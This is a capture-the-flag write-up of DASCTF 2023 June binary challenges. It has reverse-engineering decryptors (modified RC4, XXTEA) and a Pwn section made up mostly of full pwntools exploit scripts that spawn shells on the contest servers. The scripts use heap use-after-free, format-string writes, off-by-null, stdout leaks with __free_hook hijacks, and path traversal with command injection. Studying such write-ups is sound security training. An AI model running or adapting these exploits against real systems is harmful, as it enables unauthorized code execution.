01
Re
1
careful
在沙箱(隔离环境)里运行一下即可拿到结果;未知二进制不要在宿主机上直接执行。
2
babyRe
API反调试绕过+SMC+去花指令+RC4魔改
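void rc4_init(unsigned char *s, unsigned char *key, unsigned long len)
{
    /* Modified RC4 key schedule (KSA) recovered from babyRe.
     *
     * s   : 256-byte state array, filled here.
     * key : the key. Exactly 10 bytes are consumed -- the index wraps at 0xa
     *       regardless of `len`, which is kept for signature compatibility
     *       but otherwise ignored (the caller in this writeup passes
     *       strlen(data), i.e. the ciphertext length, not the key length).
     *
     * The only deviation from textbook RC4 is the swap index:
     *   j = 2*j + s[i] + k[i]   (textbook: j + s[i] + k[i]).
     * Reproduce it exactly or the keystream is wrong.
     */
    unsigned char k[256] = {0};   /* `= {}` is C23/GNU-only; `{0}` is portable C */
    unsigned int j = 0;
    (void)len;

    for (int i = 0; i < 256; i++) {
        s[i] = (unsigned char)i;
        k[i] = key[i % 0xa];
    }
    for (int i = 0; i < 256; i++) {
        j = (2 * j + s[i] + k[i]) % 256;
        unsigned char temp = s[i];
        s[i] = s[j];
        s[j] = temp;
    }
}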
void rc4_crypt(unsigned char *s, unsigned char *data, unsigned long len)
{
    /* Modified RC4 PRGA from babyRe, applied in place to data[0..len).
     *
     * Deviations from textbook RC4 (all reproduced exactly):
     *   - i advances by j (i = i + j) instead of by 1;
     *   - the keystream index is s[i] + j + s[j] rather than s[i] + s[j];
     *   - each byte is decremented by (k mod 13) *before* the XOR.
     * Subtract-then-XOR is the inverse of an XOR-then-add encryption, which is
     * consistent with this routine being the decryption direction.
     * The state `s` is mutated, so it is consumed by the call.
     */
    unsigned int i = 0, j = 0;

    for (unsigned long k = 0; k < len; k++) {
        unsigned char c = data[k] - (unsigned char)(k % 0xD);

        i = (i + j) & 0xff;
        j = (j + s[i]) & 0xff;

        unsigned char tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;

        unsigned int t = (s[i] + j + s[j]) & 0xff;
        data[k] = c ^ s[t];
    }
}
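int main()
{
    /* Decrypt the babyRe flag with the recovered (modified) RC4.
     *
     * Key and ciphertext were lifted from the binary after defeating the
     * API anti-debugging, SMC and junk instructions.  Both arrays are
     * `unsigned char` so bytes >= 0x80 are stored without the
     * implementation-defined narrowing a plain `char` initializer incurs.
     */
    unsigned char s[256] = {0};
    unsigned char key[10] = {0x5d, 0x42, 0x62, 0x29, 0x03, 0x36, 0x47, 0x41, 0x15, 0x36};
    /* 44 ciphertext bytes; data[44] stays 0 and terminates the string. */
    unsigned char data[45] = {
        0xf7, 0x2e, 0x34, 0xf0, 0x72, 0xcf, 0x5e, 0x0a, 0xbb, 0xec, 0xb1, 0x2b,
        0x70, 0x88, 0x88, 0xed, 0x46, 0x38, 0xdb, 0xda, 0x6c, 0xbd, 0xd4, 0x06,
        0x77, 0xf2, 0xcf, 0x56, 0x88, 0xc6, 0x31, 0xd2, 0xb7, 0x5a, 0xc1, 0x42,
        0xb0, 0xf4, 0x48, 0x37, 0xf5, 0x2c, 0xf5, 0x58};
    /* 44 -- identical to strlen(data) here because no ciphertext byte is 0x00,
     * but it does not silently shrink if a zero byte ever appears. */
    unsigned long len = sizeof(data) - 1;

    /* rc4_init only ever reads 10 key bytes; pass the real key length rather
     * than the ciphertext length the original listing handed it. */
    rc4_init(s, key, sizeof(key));

    /* Debug dump of the state after the KSA. */
    for (int i = 0; i < (int)sizeof(s); i++) {
        printf("%02X ", s[i]);
    }

    rc4_crypt(s, data, len);   /* in-place decryption */
    unsigned long len1 = strlen((char *)data);
    printf("解密后为:%s,%lu", (char *)data, len1);
    return 0;
}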
3
ez_exe
python3.11反编译+XXTEA
import ctypes
from time import *
from ctypes import *
from ctypes import wintypes
from hashlib import md5
class _STARTUPINFO(Structure):
    """ctypes layout of the Win32 STARTUPINFO structure.

    Recovered by pycdc from the packed Python payload.  In the code visible
    here an instance is created but never passed to any Windows API, so this
    is a leftover of the original launcher rather than part of the unpacking
    logic.  NOTE(review): the hStd* members are declared as c_ulong here; the
    real HANDLE fields are presumably pointer-sized on 64-bit Windows --
    harmless as long as the struct stays unused.  Field order defines the
    memory layout, so it is kept exactly as decompiled.
    """
    _fields_ = [
        ('cb', c_ulong),
        ('lpReserved', c_char_p),
        ('lpDesktop', c_char_p),
        ('lpTitle', c_char_p),
        ('dwX', c_ulong),
        ('dwY', c_ulong),
        ('dwXSize', c_ulong),
        ('dwYSize', c_ulong),
        ('dwXCountChars', c_ulong),
        ('dwYCountChars', c_ulong),
        ('dwFillAttribute', c_ulong),
        ('dwFlags', c_ulong),
        ('wShowWindow', c_ushort),
        ('cbReserved2', c_ushort),
        ('lpReserved2', c_char_p),
        ('hStdInput', c_ulong),
        ('hStdOutput', c_ulong),
        ('hStdError', c_ulong)]
class _PROCESS_INFORMATION(Structure):
    """ctypes layout of the Win32 PROCESS_INFORMATION structure.

    Decompiled leftover like _STARTUPINFO: instantiated below but not used by
    the visible unpacking code.  Field order is the memory layout -- unchanged.
    """
    _fields_ = [
        ('hProcess', c_void_p),
        ('hThread', c_void_p),
        ('dwProcessId', c_ulong),
        ('dwThreadId', c_ulong)]
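StartupInfo = _STARTUPINFO()
ProcessInfo = _PROCESS_INFORMATION()

# First unpacking layer, reconstructed from the pycdc output of the
# Python 3.11 bytecode: the embedded payload `task 2/bin1` is XORed with the
# repeating 32-byte hex digest of md5(b'bin1bin1bin1').  pycdc did not
# decompile the comprehension, so the loop was recovered by reading the
# bytecode by hand.  (The `//` comment in the paste was a C-style comment
# inside Python and made the snippet unparsable.)
key1 = md5(b'bin1bin1bin1').hexdigest().encode()


def xor_with_key(data, key):
    """Return `data` XORed with `key` repeated cyclically.

    `data` and `key` are bytes-like; `key` must be non-empty (a zero-length
    key would otherwise raise ZeroDivisionError from the modulo).
    """
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


with open('./task 2/bin1', 'rb') as fh:
    file = fh.read()
with open('bin3', 'wb') as out:
    out.write(xor_with_key(file, key1))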
bin2 同理:把上面的 key 种子换成 bin2bin2bin2(key 的派生方式与 bin1 相同),对 bin2 做同样的循环异或即可解出下一层。
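int main()
{
    /* XXTEA (btea) decryption of the ez_exe flag.
     *
     * The writeup's listing referenced an undefined `delta` and its array
     * indices were lost in extraction (`z = v ;`, `v -= ...`); the loop body
     * below is the standard btea decrypt structure restored: z = v[p-1],
     * v[p] -= MX, y = v[p].  0x9e3779b9 is the textbook XXTEA constant --
     * confirm it against the binary, the challenge may have changed it.
     */
    const unsigned int DELTA = 0x9e3779b9;

    /* 11 ciphertext words and the 128-bit key, lifted from the binary. */
    unsigned int v[11] = {0xCC45699D, 0x683D5352, 0xB8BB71A0, 0xD3817AD, 0x7547E79E,
                          0x4BDD8C7C, 0x95E25A81, 0xC4525103, 0x7049B46F, 0x5417F77C,
                          0x65567138};
    unsigned int key[4] = {0x00004B5F, 0x0000DEAD, 0x000011ED, 0x0000B3CC};
    unsigned int sum = 0;
    unsigned int y, z, p, rounds, e;
    int n = 11;
    int i = 0;

    /* NOTE: reference XXTEA runs 6 + 52/n rounds; this variant uses 52/n
     * (= 4 for n == 11), so decryption starts from sum = rounds * delta. */
    rounds = 52 / n;
    y = v[0];
    sum = rounds * DELTA;
    do {
        e = (sum >> 2) & 3;
        for (p = n - 1; p > 0; p--) {
            z = v[p - 1];
            v[p] -= ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4))) ^ ((key[(p & 3) ^ e] ^ z) + (y ^ sum)));
            y = v[p];
        }
        z = v[n - 1];
        /* p == 0 here, so key[(p ^ e) & 3] == key[e & 3]. */
        v[0] -= (((key[(p ^ e) & 3] ^ z) + (y ^ sum)) ^ (((y << 2) ^ (z >> 5)) + ((z << 4) ^ (y >> 3))));
        y = v[0];
        sum = sum - DELTA;
    } while (--rounds);

    /* Emit each word as its four bytes in memory order (low byte first on x86);
     * the commented alternative reverses the order if the flag comes out scrambled. */
    for (i = 0; i < n; i++) {
        printf("%c%c%c%c", *((char *)&v[i] + 0), *((char *)&v[i] + 1), *((char *)&v[i] + 2), *((char *)&v[i] + 3));
        //printf("%c%c%c%c",*((char*)&v[i]+3),*((char*)&v[i]+2),*((char*)&v[i]+1),*((char*)&v[i]+0));
    }
    return 0;
}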
02
Pwn
1
easynote
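#coding:utf-8
"""easynote -- glibc 2.23 heap exploit (DASCTF 2023-06, BUUOJ mirror).

Python 2 / legacy pwntools: str and bytes are one type here, so
``p64(...) + '\\x00'`` works; under Python 3 these concatenations raise
TypeError.  The ``\\x7f`` / ``\\x00`` / ``\\n`` escapes were restored from a
paste that had dropped the backslashes -- without them recvuntil() never
matches and the script hangs.

What the script does (all offsets are for the challenge's libc-2.23):
  1. delete(0) + show(0): note 0 is still readable after free (UAF read).
     The first qword of the freed 0x100 chunk points into main_arena
     (main_arena+88), and __malloc_hook + 0x10 == main_arena, hence the
     libc base arithmetic.
  2. delete(1) + edit(1): the freed 0x70 chunk's fd is overwritten (UAF write)
     with __malloc_hook-0x23, the usual fake 0x7f-sized chunk just before the hook.
  3. two add(0x68): the second returns the fake chunk; 0x13 bytes of padding
     (0x23 minus the 0x10 header) put the one_gadget exactly on __malloc_hook.
  4. delete(0) frees an already-freed chunk.  Presumably the intent is glibc
     2.23's error path, which ends up calling malloc() and so fires the hook --
     confirm against the binary if no shell appears.
Run with no argument for a local process (gdb attach enabled), any argument
for the remote instance.  The outer ``while True`` is a retry scaffold.
"""
import sys
from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
elfelf = './pwn'

while True:
    elf = ELF(elfelf)
    context.arch = elf.arch
    gdb_text = '''
telescope $rebase(0x202040) 16
'''
    # one_gadget offsets for libc-2.23; index 2 (0xf03a4) is the one used below.
    one_gadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
    if len(sys.argv) == 1:
        io = process(elfelf)
        gdb_open = 1
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        io = remote('node4.buuoj.cn', 29223)
        gdb_open = 0
        libc = ELF('./libc-2.23.so')

    def gdb_attach(io, a):
        """Attach gdb with command script `a`; local runs only."""
        if gdb_open == 1:
            gdb.attach(io, a)

    def choice(a):
        """Answer the main menu (prompt ends in '5. exit')."""
        io.sendlineafter('5. exit\n', str(a))

    def add(a, b):
        """Menu 1: new note of size `a` with content `b` (sent raw, no newline)."""
        choice(1)
        io.sendlineafter('--->\n', str(a))
        io.sendafter('--->\n', b)

    def edit(a, c, b):
        """Menu 2: rewrite note `a` with `c` bytes of content `b`."""
        choice(2)
        io.sendlineafter('--->\n', str(a))
        io.sendlineafter('--->\n', str(c))
        io.sendafter('--->\n', b)

    def show(a):
        """Menu 4: print note `a`."""
        choice(4)
        io.sendlineafter('--->\n', str(a))

    def delete(a):
        """Menu 3: free note `a`."""
        choice(3)
        io.sendlineafter('--->\n', str(a))

    add(0xf8, 'aaa')   # idx 0 -> 0x100 chunk (not fastbin-sized: goes to the unsorted bin on free)
    add(0x68, 'aaa')   # idx 1 -> 0x70 chunk (fastbin-sized)
    delete(0)
    show(0)            # UAF read: fd of the freed chunk -> main_arena+88
    leak = u64(io.recvuntil('\x7f')[-6:] + '\x00\x00')
    libc_base = leak - libc.sym['__malloc_hook'] - 88 - 0x10
    libc.address = libc_base

    delete(1)
    # UAF write: fastbin fd -> fake chunk whose 0x7f size byte sits 0x23 before __malloc_hook.
    edit(1, 0x8, p64(libc.sym['__malloc_hook'] - 0x23))
    add(0x68, 'aaa')   # takes chunk 1 back out of the fastbin
    add(0x68, '\x00' * 0x13 + p64(libc_base + one_gadget[2]))   # returns the fake chunk; pad lands on __malloc_hook
    delete(0)          # second free of note 0 -> error path -> malloc -> hook fires
    success('libc_base:' + hex(libc_base))
    # gdb_attach(io, gdb_text)
    io.interactive()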
2
fooooood
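#coding:utf-8
"""fooooood -- format-string exploit (Python 2 / legacy pwntools).

Leak: '%8$p%9$p%11$p' prints a PIE address (8th arg; elf_base = value - 0xb60),
a libc address (9th: __libc_start_main + 240, the glibc-2.23 return address)
and a stack pointer (11th).

Write primitive (two-level): '%<N>c%11$hn' stores N into the low 16 bits of
the stack slot arg 11 points to, turning that slot into a pointer at a chosen
stack address; '%<B>c%37$hhn' then writes byte B through that pointer (arg 37
is the slot itself).  fmt(addr, value) repeats this for the low six bytes of
value; bytes 6 and 7 of a 0x00007f... libc address are assumed to be 0 already.

Fixes versus the paste:
  * restored the '\\x00' escape and added the missing ``import sys``
    (sys.argv is used below);
  * a zero byte is now written correctly.  '%0c' still prints one character,
    so the original stored 0x01 wherever 0x00 was meant -- and byte 5 of a
    0x00007f.... one_gadget address is 0x00.  A zero now uses a count of 256
    (65536 for the 16-bit write), which wraps to 0 under %hhn / %hn.
The purpose of the '%255c' write and the 248 blank lines is not visible here
(presumably a loop counter keeping the program alive); confirm in the binary.
"""
import sys
from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
elfelf = './pwn'
elf = ELF(elfelf)
context.arch = elf.arch
gdb_text = '''
b *$rebase(0xB27)
'''
# one_gadget offsets for libc-2.23; index 3 (0xf1247) is used below.
one_gadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
if len(sys.argv) == 1:
    io = process(elfelf)
    gdb_open = 1
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elif sys.argv[1] == '2':
    io = process(elfelf)
    gdb_open = 0
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('node4.buuoj.cn', 29176)
    gdb_open = 0
    libc = ELF('./libc.so.6')


def gdb_attach(io, a):
    """Attach gdb with command script `a`; local runs only."""
    if gdb_open == 1:
        gdb.attach(io, a)


def _count(value, width_bits):
    """Return the %c count that leaves `value` in a %hhn/%hn store.

    printf cannot emit zero characters with '%0c', so a zero target byte/word
    needs a full wrap (2**width) instead.
    """
    return value if value else 1 << width_bits


io.sendlineafter('name:', 'keer')


def go(a):
    """Submit one format string through the 'favourite food' prompt."""
    io.sendlineafter('favourite food: ', a)


go('%8$p%9$p%11$p')
io.recvuntil('You like ')
elf_base = int(io.recv(14), 16) - 0xb60
libc_base = int(io.recv(14), 16) - libc.sym['__libc_start_main'] - 240
libc.address = libc_base
# Low 16 bits of the stack slot we want to target, derived from the leaked stack pointer.
stack_addr = (int(io.recv(14), 16) - 0x3518 + 0x3424) & 0xffff
go('%' + str(_count(stack_addr, 16)) + 'c%11$hn')
go('%255' + 'c%37$hhn')


def fmt(addr, value):
    """Write the low 6 bytes of `value` to stack address `addr`, one byte at a time.

    Only the low byte of the arg-11 pointer is re-aimed for bytes 1..5, so
    addr..addr+5 must not cross a 0x100 boundary (same limitation as the
    original).
    """
    go('%' + str(_count(addr & 0xffff, 16)) + 'c%11$hn')
    go('%' + str(_count(value & 0xff, 8)) + 'c%37$hhn')
    for i in range(5):
        go('%' + str(_count((addr + 1 + i) & 0xff, 8)) + 'c%11$hhn')
        go('%' + str(_count((value >> ((i + 1) * 8)) & 0xff, 8)) + 'c%37$hhn')


fmt(stack_addr + 0xc + 8, libc_base + one_gadget[3])
for i in range(248):
    io.sendline('')
success('libc_base:' + hex(libc_base))
gdb_attach(io, gdb_text)
io.interactive()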
3
Candy_Shop
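#coding:utf-8
"""Candy_Shop -- format-string leak + out-of-bounds index write (Python 2 / legacy pwntools).

Restored the '\\n' and '\\x7f' escapes that the paste had stripped.

  * show('%31$p'): the "get" path prints our string through printf, so
    '%31$p' leaks a stack-resident libc return address
    (__libc_start_main + 128 for the challenge libc).
  * The buy handler accepts a negative index, so writes land before the
    candy array.  From the payload shape the target is presumably a
    pointer table (GOT-like): partial copies of puts/printf are re-written,
    system is placed over a neighbouring slot with its top byte 0x7f fixed up
    separately, and "/bin/sh" is stored at index 0 so a later call through
    that slot becomes system("/bin/sh").  What the index -2 write sets up is
    not inferable here.  Confirm the exact layout in the binary.
Run with no argument for a local process (gdb attach on), with any argument
for the remote instance.  The ``while True`` wrapper is a retry scaffold.
"""
import sys
from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
elfelf = './pwn'

while True:
    elf = ELF(elfelf)
    context.arch = elf.arch
    gdb_text = '''
telescope $rebase(0x202040) 16
'''
    if len(sys.argv) == 1:
        io = process(elfelf)
        gdb_open = 1
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        io = remote('node4.buuoj.cn', 27065)
        gdb_open = 0
        libc = ELF('./libc.so.6')

    def gdb_attach(io, a):
        """Attach gdb with command script `a`; local runs only."""
        if gdb_open == 1:
            gdb.attach(io, a)

    def choice(a):
        """Answer the letter-based main menu."""
        io.sendlineafter('option: ', str(a))

    def add(a, b, c):
        """Option 'b' (buy): item `a`, index `b` (no lower-bound check), content `c` sent raw."""
        choice('b')
        io.sendlineafter('Which one you want to bye: ', a)
        io.sendlineafter(': ', b)
        io.sendafter(': ', c)

    def show(a):
        """Option 'g' (get): `a` is printed back through printf -> format string."""
        choice('g')
        io.sendlineafter(': \n', a)

    show('%31$p')
    io.recvuntil('0x')
    libc_base = int(io.recv(12), 16) - libc.sym['__libc_start_main'] - 128
    libc.address = libc_base
    system_addr = libc.sym['system']

    add('t', '-2', 'a' * 6 + '99999\n')
    # Skip the low 2 bytes of puts (left as they are), then printf, then the low 5 bytes of system.
    add('t', '-10', p64(libc.sym['puts'])[0x2:] + p64(libc.sym['printf']) + p64(system_addr)[:5])
    add('t', '-9', '\x7f\n')       # top byte of the system address
    add('t', '0', '/bin/sh\n')
    success('libc_base:' + hex(libc_base))
    gdb_attach(io, gdb_text)
    io.interactive()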
4
Approoooooooaching
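#coding:utf-8
"""Approoooooooaching -- brainfuck-interpreter challenge (Python 2 / legacy pwntools).

The visible interaction is short: create a 0xfff-byte program ('ix'*4+'yyy'),
run it (menu 3), answer the following prompt with 4 and send a single 0xE0
byte.  What the program text and that byte do depends on the interpreter's
instruction set, which is not visible here; the program string is kept
verbatim because the paste does not tell whether escapes were lost inside it.
Restored: the '\\n' in the prompt markers and the '\\xE0' byte (was 'xE0').
Run with no argument for a local process (gdb attach on), with any argument
for the remote instance.  The ``while True`` wrapper is a retry scaffold.
"""
import sys
from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
elfelf = './bf'

while True:
    elf = ELF(elfelf)
    context.arch = elf.arch
    gdb_text = '''
b *$rebase(0x15B9)
'''
    if len(sys.argv) == 1:
        io = process(elfelf)
        gdb_open = 1
    else:
        io = remote('139.155.140.235', 9999)
        gdb_open = 0

    def gdb_attach(io, a):
        """Attach gdb with command script `a`; local runs only."""
        if gdb_open == 1:
            gdb.attach(io, a)

    def choice(a):
        io.sendlineafter('choice: \n', str(a))

    def add(a, b):
        """Menu 1 sets the program size `a`, menu 2 supplies the program text `b` (raw)."""
        choice(1)
        io.sendlineafter('size: ', str(a))
        choice(2)
        io.sendafter('text: ', b)

    def bf():
        """Menu 3: run the interpreter."""
        choice(3)

    def run():
        """Menu 4."""
        choice(4)

    add(0xfff, 'ix' * 0x4 + 'yyy')
    gdb_attach(io, gdb_text)
    bf()
    io.sendafter('choice: \n', '4\n')
    io.send('\xE0')   # single byte consumed by the running program (was 'xE0' in the paste)
    io.interactive()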
5
server
通过动态调试可以发现,access() 校验所用的路径缓冲区长度是固定的:输入足够长的路径时,程序拼接在末尾的 .key 后缀会被顶掉(截断),校验的实际路径完全由输入控制;同时超长输入还会越过该缓冲区,覆盖到后面被拼进命令字符串的内容,形成命令注入。因此第一步写入以 /bin/sh # 结尾的目录穿越路径(`#` 让 shell 忽略后面残留的内容),第二步再用单引号闭合前面的参数,即可执行 /bin/sh。根因是两处输入都没有长度限制和字符过滤。
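#!/usr/bin/env python
#coding=utf-8
"""server -- path traversal + command injection (pwntools, bytes API).

From the writeup: the path handed to access() lives in a fixed-size buffer,
so a long enough input pushes the appended ".key" suffix out of the checked
path, and the same over-long input runs on into the buffer that later becomes
part of a shell command.  Step 1 therefore submits a traversal path ending in
"/bin/sh #" (the '#' comments out whatever the program appends); step 2 sends
a single quote to close the quoted argument so the injected command runs.

Fixed versus the paste: the shebang ('#!usr/bin/env' lacked the leading
slash) and the '\\n' escapes in the prompt markers.  Set DEBUG = 1 for a
local process with gdb attached.
"""
from pwn import *
from ctypes import CDLL

context(arch='amd64', os='linux', log_level='debug')
elf = ELF('./pwn_7')
DEBUG = 0
if DEBUG:
    gdbOpen = 1
    p = process('./pwn_7')
else:
    gdbOpen = 0
    ip = 'node4.buuoj.cn'
    port = 25599
    p = remote(ip, port)


def debug(info="b main"):
    """Attach gdb with the given command string when running locally."""
    if gdbOpen == 1:
        gdb.attach(p, info)


debug('b *$rebase(0x0000000000001495)')
# 1: the "admin" path.  Enough '../' to reach the filesystem root, then
# /bin/sh and a trailing '#' so anything appended by the program is a comment.
p.sendlineafter(b'>> ', b'1')
p.sendlineafter(b'admin : \n', b'../../../../../././bin/sh #')
# 2: a lone single quote closes the quoted argument in the built command.
p.sendlineafter(b'>> ', b'2')
p.sendlineafter(b'add : \n', b"'")
p.interactive()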
6
can_you_find_me
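#coding:utf-8
"""can_you_find_me -- glibc 2.27 heap exploit (Python 2 / legacy pwntools).

Restored from a paste that had stripped every backslash ('\\n', '\\x00', ...);
without them none of the recvuntil()/sendafter() markers match.

Outline (hedged where the binary is not visible here):
  * six notes are allocated so that chunk 0 (0x500), 1 and 2 (0x100 each) and
    3 (0x200) are contiguous and together span exactly 0x900 bytes, followed
    by chunk 4 (0x500) and 5 (0x100);
  * delete(0), delete(3), then re-adding 0x1f8 bytes ending in p64(0x900)
    places 0x900 in chunk 4's prev_size.  Presumably the add routine also
    writes a terminating NUL one byte past the request, clearing chunk 4's
    PREV_INUSE bit (off-by-null) -- confirm in the binary;
  * delete(4) then consolidates backwards over chunks 1-3 into the freed
    chunk 0, so later allocations overlap the still-live notes;
  * the '\\x60\\x77' write is a 2-byte partial overwrite of a tcache fd
    towards _IO_2_1_stdout_; the 4 ASLR bits inside it are guessed, which is
    why everything sits in a retry loop (expected 1/16 success rate);
  * add(0xf0, p64(0xfbad1887) + p64(0)*3 + '\\xc8') is the usual stdout
    flags / _IO_write_base corruption that makes the next output leak libc
    pointers; the base is taken relative to _IO_2_1_stdin_;
  * finally __free_hook is set to system and a chunk holding "/bin/sh" is freed.
Offsets and libc paths refer to the author's environment (glibc-all-in-one).
"""
import sys
from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
elfelf = './pwn'

while True:
    try:
        elf = ELF(elfelf)
        context.arch = elf.arch
        gdb_text = '''
telescope $rebase(0x202040) 16
'''
        if len(sys.argv) == 1:
            io = process(elfelf)
            gdb_open = 1
            libc = ELF('/glibc/x64/2.27/lib/libc-2.27.so')
        else:
            io = remote('node4.buuoj.cn', 27065)
            gdb_open = 0
            libc = ELF('/home/keer/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so')

        def gdb_attach(io, a):
            """Attach gdb with command script `a`; local runs only."""
            if gdb_open == 1:
                gdb.attach(io, a)

        def choice(a):
            io.sendlineafter('choice:', str(a))

        def add(a, b):
            """Menu 1: allocate `a` bytes and fill with `b` (sent raw)."""
            choice(1)
            io.sendlineafter('Size:', str(a))
            io.sendafter('Data:', b)

        def show(a):
            """Menu 3: print note `a`."""
            choice(3)
            io.sendlineafter('Index:', str(a))

        def delete(a):
            """Menu 2: free note `a`.

            NOTE(review): the original template also had an edit() helper that
            sent this same menu option; it was unused and is dropped here.
            """
            choice(2)
            io.sendlineafter('Index:', str(a))

        add(0x4f0, 'aaa\n')   # 0: 0x500
        add(0xf0, 'aaa\n')    # 1: 0x100
        add(0xf0, 'aaa\n')    # 2: 0x100
        add(0x1f0, 'aaa\n')   # 3: 0x200   -> 0..3 span 0x900 bytes
        add(0x4f0, 'aaa\n')   # 4: 0x500
        add(0xf0, 'aaa\n')    # 5: 0x100
        delete(0)
        delete(3)
        # Re-take chunk 3 and write 0x900 into chunk 4's prev_size (fake "previous chunk" = chunk 0).
        add(0x1f8, '\x00' * 0x1f0 + p64(0x900))
        delete(4)             # backward consolidation over 1..3 into chunk 0
        delete(1)
        delete(0)
        add(0x4f0, '\n')
        # Overlapping write: 2-byte partial overwrite of chunk 1's tcache fd -> _IO_2_1_stdout_ (guess).
        add(0x1e0, '\x60\x77\n')
        add(0xf0, 'aaa\n')
        # Next 0xf0 allocation returns stdout itself: corrupt flags and write_base to leak.
        add(0xf0, p64(0xfbad1887) + p64(0) * 3 + '\xc8' + '\n')
        libc_base = u64(io.recvuntil('\x7f')[-6:] + '\x00\x00') - libc.sym['_IO_2_1_stdin_']
        libc.address = libc_base
        system_addr = libc.sym['system']
        free_hook_addr = libc.sym['__free_hook']
        add(0x110, '/bin/sh\x00' + p64(0x1f8) + p64(free_hook_addr) + '\n')
        add(0x1f0, '/bin/sh\x00\n')
        add(0x1f0, p64(system_addr) + '\n')   # lands on __free_hook
        delete(6)             # free("/bin/sh") -> system("/bin/sh")
        success('libc_base:' + hex(libc_base))
        gdb_attach(io, gdb_text)
        io.interactive()
    except Exception as e:
        # The partial-overwrite guess fails most of the time; log the reason
        # instead of swallowing it silently, then retry.
        log.warning('attempt failed (%s), retrying' % e)
        io.close()
        continue
    else:
        continue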
7
matchmaking platform
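#coding:utf-8
"""matchmaking platform -- glibc 2.31 heap exploit (Python 2 / legacy pwntools).

Each step is two inputs at the '>> ' prompt: 0x80 filler bytes plus one byte
that overwrites the low byte of something right after the buffer (presumably
a pointer the next input is written through -- confirm in the binary), then
the data written via that pointer.

  * '\\x80' + p64(0xfbda1887)...: stdout-struct corruption to leak libc; the
    base is taken relative to _IO_2_1_stdin_.  NOTE(review): the usual flags
    value for this trick is 0xfbad1887; 0xfbda1887 is kept as the author used
    it, but check it first if the leak fails.
  * '\\x60' + p64(__free_hook) + '\\x05', then '\\x60' + p64(system):
    __free_hook = system.
  * '\\xc8' + "/bin/sh\\0": the string that is freed afterwards.
Fixes versus the paste: restored backslash escapes and added the missing
``import sys`` (sys.argv is used).  Run with no argument for a local process
with gdb, '2' for local without gdb, anything else for remote.
"""
import sys
from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
elfelf = './pwn'
elf = ELF(elfelf)
context.arch = elf.arch
gdb_text = '''
'''
if len(sys.argv) == 1:
    io = process(elfelf)
    gdb_open = 1
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elif sys.argv[1] == '2':
    io = process(elfelf)
    gdb_open = 0
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('node4.buuoj.cn', 25131)
    gdb_open = 0
    libc = ELF('/home/keer/tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc.so.6')


def gdb_attach(io, a):
    """Attach gdb with command script `a`; local runs only."""
    if gdb_open == 1:
        gdb.attach(io, a)


# Redirect the next write to stdout and corrupt flags/write_base to leak.
io.sendafter('>> ', 'a' * 0x80 + '\x80')
io.sendafter('>> ', p64(0xfbda1887) + p64(0) * 3 + '\x08\n')
libc_base = u64(io.recvuntil('\x7f')[-6:] + '\x00\x00') - libc.sym['_IO_2_1_stdin_']
libc.address = libc_base
system_addr = libc.sym['system']
free_hook_addr = libc.sym['__free_hook']

io.sendafter('>> ', 'a' * 0x80 + '\x60')
io.sendafter('>> ', p64(free_hook_addr) + '\x05\n')
io.sendafter('>> ', 'a' * 0x80 + '\x60')
io.sendafter('>> ', p64(system_addr) + '\n')      # __free_hook = system
io.sendafter('>> ', 'a' * 0x80 + '\xc8')
io.sendafter('>> ', '/bin/sh\x00' + '\n')
success('libc_base:' + hex(libc_base))
gdb_attach(io, gdb_text)
io.interactive()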
原文始发于微信公众号(EDI安全):DASCTF 2023六月挑战赛|二进制专项-WriteUp By EDISEC